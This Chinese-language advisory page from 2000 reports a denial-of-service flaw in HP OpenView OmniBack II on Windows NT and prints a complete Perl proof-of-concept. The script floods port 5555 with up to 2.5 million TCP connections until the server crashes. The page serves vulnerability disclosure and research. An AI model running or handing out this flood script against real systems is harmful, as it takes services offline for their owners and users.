首页 -> 安全研究

安全研究

安全漏洞
HP OpenView OmniBack拒绝服务漏洞

发布日期:2000-03-01
更新日期:2000-03-01

受影响系统:
HP OpenView OmniBack II 3.1
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 3.5.1
   - Microsoft Windows NT 2000.0
HP OpenView OmniBack II 3.0
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 3.5.1
   - Microsoft Windows NT 2000.0
HP OpenView OmniBack II 2.55
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 3.5.1
   - Microsoft Windows NT 2000.0
描述:

来源:Jon Hittner <jon@hittner.com>

    同时打开到HP OpenView OmniBack监听的5555端口的多个连接,会使CPU使用率升至100%,从而导致服务器崩溃。仅仅关闭这些连接并不能解决问题,必须手工重启系统。



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


#!/usr/bin/perl
#
# Jon Hittner
# Raise the memory size for omnilnet until Windows NT crashes
# Test against NT4.0 SP5 , NT3.51 , Winframe 1.7 SP5b , Winframe 1.8
# Probably needs to be run several times to crash the system depending
# on the amount of memory in the system.
# This code was written to demo a problem, and I take no respoablity on how
# it's used

use strict; use Socket;

my($y,$h,$p,$in_addr,$proto,$addr);

$h = "$ARGV[0]"; $p = 5555 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.domain.com\n"; }

$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
print "TESTING: $h:$p\n";
for ($y=1 ; $y<2500000 ; $y++) {
    socket(S, AF_INET, SOCK_STREAM, $proto);
    connect(S,$addr) or next;
    select S;
    $| = 1;
    select STDOUT;
    send S,"OMNIBACK HAS SOME BIG ISSUES",0;
    }
print "ATTACK COMPLETED!\n";



建议:
暂无

浏览次数:6381
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障